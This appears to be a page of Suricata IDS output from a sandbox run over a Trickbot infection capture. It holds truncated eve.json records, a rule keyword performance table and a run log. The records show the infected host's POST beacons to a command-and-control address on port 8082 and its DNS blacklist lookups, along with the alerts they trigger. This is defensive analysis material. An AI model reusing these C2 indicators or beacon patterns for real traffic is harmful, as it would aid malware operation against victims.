{"timestamp":"2019-01-30T21:05:22.548371+0000","flow_id":1405730205864804,"pcap_cnt":3158,"event_type":"http","src_ip":"10.1.30.101","src_port":49203,"dest_ip":"24.247.181.125","dest_port":8082,"proto":"TCP","tx_id":0,"http":{"hostname":"24.247.181.125","url":"\/ser0130us\/BRONSON-PC_W617601.9A539CBEA91F2D8402D649FD6638406A\/81\/","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain"}}
{"timestamp":"2019-01-30T21:05:22.548600+0000","flow_id":1405730205864804,"pcap_cnt":3160,"event_type":"fileinfo","src_ip":"24.247.181.125","src_port":8082,"dest_ip":"10.1.30.101","dest_port":49203,"proto":"TCP","http":{"hostname":"24.247.181.125","url":"\/ser0130us\/BRONSON-PC_W617601.9A539CBEA91F2D8402D649FD6638406A\/81\/","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":3},"app_proto":"http","fileinfo":{"filename":"\/ser0130us\/BRONSON-PC_W617601.9A539CBEA91F2D8402D649FD6638406A\/81\/","gaps":false,"state":"CLOSED","stored":false,"size":3,"tx_id":0}}
{"timestamp":"2019-01-30T21:06:07.110045+0000","flow_id":568082737020331,"pcap_cnt":3243,"event_type":"alert","src_ip":"10.1.30.101","src_port":49204,"dest_ip":"24.247.181.125","dest_port":8082,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2018358,"rev":7,"signature":"ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
{"timestamp":"2019-01-30T21:06:07.110045+0000","flow_id":568082737020331,"pcap_cnt":3243,"event_type":"http","src_ip":"10.1.30.101","src_port":49204,"dest_ip":"24.247.181.125","dest_port":8082,"proto":"TCP","tx_id":0,"http":{"hostname":"24.247.181.125","url":"\/ser0130us\/BRONSON-PC_W617601.9A539CBEA91F2D8402D649FD6638406A\/83\/","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain"}}
{"timestamp":"2019-01-30T21:06:07.110317+0000","flow_id":568082737020331,"pcap_cnt":3245,"event_type":"fileinfo","src_ip":"24.247.181.125","src_port":8082,"dest_ip":"10.1.30.101","dest_port":49204,"proto":"TCP","http":{"hostname":"24.247.181.125","url":"\/ser0130us\/BRONSON-PC_W617601.9A539CBEA91F2D8402D649FD6638406A\/83\/","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":3},"app_proto":"http","fileinfo":{"filename":"\/ser0130us\/BRONSON-PC_W617601.9A539CBEA91F2D8402D649FD6638406A\/83\/","gaps":false,"state":"CLOSED","stored":false,"size":3,"tx_id":0}}
{"timestamp":"2019-01-30T21:06:10.021646+0000","flow_id":1225500496305908,"pcap_cnt":3265,"event_type":"alert","src_ip":"10.1.30.101","src_port":49205,"dest_ip":"24.247.181.125","dest_port":8082,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2018358,"rev":7,"signature":"ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
{"timestamp":"2019-01-30T21:06:10.021646+0000","flow_id":1225500496305908,"pcap_cnt":3265,"event_type":"http","src_ip":"10.1.30.101","src_port":49205,"dest_ip":"24.247.181.125","dest_port":8082,"proto":"TCP","tx_id":0,"http":{"hostname":"24.247.181.125","url":"\/ser0130us\/BRONSON-PC_W617601.9A539CBEA91F2D8402D649FD6638406A\/81\/","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain"}}
{"timestamp":"2019-01-30T21:06:10.021854+0000","flow_id":1225500496305908,"pcap_cnt":3267,"event_type":"fileinfo","src_ip":"24.247.181.125","src_port":8082,"dest_ip":"10.1.30.101","dest_port":49205,"proto":"TCP","http":{"hostname":"24.247.181.125","url":"\/ser0130us\/BRONSON-PC_W617601.9A539CBEA91F2D8402D649FD6638406A\/81\/","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":3},"app_proto":"http","fileinfo":{"filename":"\/ser0130us\/BRONSON-PC_W617601.9A539CBEA91F2D8402D649FD6638406A\/81\/","gaps":false,"state":"CLOSED","stored":false,"size":3,"tx_id":0}}
{"timestamp":"2019-01-30T21:06:28.324763+0000","flow_id":1145156691883163,"pcap_cnt":3276,"event_type":"dns","src_ip":"10.1.30.101","src_port":59778,"dest_ip":"10.1.30.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64962,"rrname":"112.146.66.173.zen.spamhaus.org","rrtype":"A","tx_id":0}}
{"timestamp":"2019-01-30T21:06:28.355809+0000","flow_id":1145156691883163,"pcap_cnt":3277,"event_type":"dns","src_ip":"10.1.30.1","src_port":53,"dest_ip":"10.1.30.101","dest_port":59778,"proto":"UDP","dns":{"type":"answer","id":64962,"rcode":"NXDOMAIN","rrname":"112.146.66.173.zen.spamhaus.org"}}
{"timestamp":"2019-01-30T21:06:28.355809+0000","flow_id":1145156691883163,"pcap_cnt":3277,"event_type":"dns","src_ip":"10.1.30.1","src_port":53,"dest_ip":"10.1.30.101","dest_port":59778,"proto":"UDP","dns":{"type":"answer","id":64962,"rcode":"NXDOMAIN","rrname":"zen.spamhaus.org","rrtype":"SOA","ttl":10}}
{"timestamp":"2019-01-30T21:06:28.356445+0000","flow_id":2203449518485597,"pcap_cnt":3278,"event_type":"dns","src_ip":"10.1.30.101","src_port":50548,"dest_ip":"10.1.30.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32949,"rrname":"112.146.66.173.cbl.abuseat.org","rrtype":"A","tx_id":0}}
{"timestamp":"2019-01-30T21:06:28.402791+0000","flow_id":2203449518485597,"pcap_cnt":3279,"event_type":"dns","src_ip":"10.1.30.1","src_port":53,"dest_ip":"10.1.30.101","dest_port":50548,"proto":"UDP","dns":{"type":"answer","id":32949,"rcode":"NXDOMAIN","rrname":"112.146.66.173.cbl.abuseat.org"}}
{"timestamp":"2019-01-30T21:06:28.402791+0000","flow_id":2203449518485597,"pcap_cnt":3279,"event_type":"dns","src_ip":"10.1.30.1","src_por

This file has been truncated. Go here to download in full.


keyword_perf.log - (16805 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 1/31/2019 -- 09:00:39
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flags            9690            3               3               4019            3230.00         3230.00         0.00           
  dsize            13419           4               4               3997            3354.00         3354.00         0.00           
  flow             6015679         1904            1904            102079          3159.00         3159.00         0.00           
  threshold        54788           4               1               38445           13697.00        38445.00        5447.00        
  content          43108291        3464            1249            8520512         12444.00        18984.00        8756.00        
  pcre             1459063         283             83              28466           5155.00         5106.00         5175.00        
  byte_test        828697          265             136             15761           3127.00         3160.00         3092.00        
  byte_jump        253801          70              62              24221           3625.00         3292.00         6204.00        
  isdataat         44501           16              7               3748            2781.00         2826.00         2746.00        
  flowbits         2029750         684             51              24932           2967.00         4034.00         2881.00        
  urilen           398743          98              51              51335           4068.00         4072.00         4064.00        
  byte_extract     32686           12              12              3979            2723.00         2723.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flags            9690            3               3               4019            3230.00         3230.00         0.00           
  dsize            13419           4               4               3997            3354.00         3354.00         0.00           
  flow             6015679         1904            1904            102079          3159.00         3159.00         0.00           
  flowbits         1925202         667             34              19188           2886.00         2976.00         2881.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          12180366        1589            581             458960          7665.00         9898.00         6378.00        
  pcre             482097          105             49              28466           4591.00         3953.00         5149.00        
  byte_test        828697          265             136             15761           3127.00         3160.00         3092.00        
  byte_jump        188352          50              42              24221           3767.00         3302.00         6204.00        
  isdataat         32702           12              3               2995            2725.00         2662.00         2746.00        
  byte_extract     32686           12              12              3979            2723.00         2723.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         104548          17              17              24932           6149.00         6149.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: threshold
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  threshold        54788           4               1               38445           13697.00        38445.00        5447.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          400148          109             33              5042            3671.00         3847.00         3594.00        
  pcre             326121          54              1               23858           6039.00         23858.00        5703.00        
  urilen           398743          98              51              51335           4068.00         4072.00         4064.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_client_body
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          308442          52              16              30772           5931.00         6061.00         5873.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          23037           7               0               3752            3291.00         0.00            3291.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          26536046        697             201             8520512         38071.00        79471.00        21294.00       
  pcre             292247          68              0               25083           4297.00         0.00            4297.00        
  byte_jump        65449           20              20              7275            3272.00         3272.00         0.00           
  isdataat         11799           4               4               3748            2949.00         2949.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1588417         371             303             49553           4281.00         4194.00         4668.00        
  pcre             268926          44              27              18594           6111.00         6047.00         6214.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          153668          40              27              5281            3841.00         3778.00         3972.00        
  pcre             13725           3               0               4894            4575.00         0.00            4575.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_len
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          13241           3               3               4921            4413.00         4413.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_raw_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          12007           3               0               4450            4002.00         0.00            4002.00        
  pcre             32956           3               0               19669           10985.00        0.00            10985.00       
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          52456           14              10              5069            3746.00         3712.00         3834.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          365406          86              55              33156           4248.00         4865.00         3154.00        
  pcre             42991           6               6               20103           7165.00         7165.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_msg
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          10844           3               0               4370            3614.00         0.00            3614.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          35409           10              10              4417            3540.00         3540.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: tls_cert_subject
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          36184           10              10              4944            3618.00         3618.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: tls_cert_serial
  -------------------------------------------------------------------------------------------------------

This file has been truncated. Go here to download in full.


IDSDeathBlossom.py.log - (1177 bytes) - download
1
2
3
4
5
6
7
8
2019-01-31 09:00:17,373 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-01-31 09:00:18,073 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-01-31 09:00:18,073 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2019-01-31 09:00:18,073 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-01-31 09:00:18,073 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-01-31 09:00:18,074 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/27c27f6013451b522f979b5a048809f156b33745cb75ec8c950e11a498e082d2 -r /var/pcap/01312019.0900-2019-01-30-Trickbot-infection-traffic.pcap -vvv -k none
2019-01-31 09:00:39,252 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-01-31 09:00:39,252 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 21.8865549564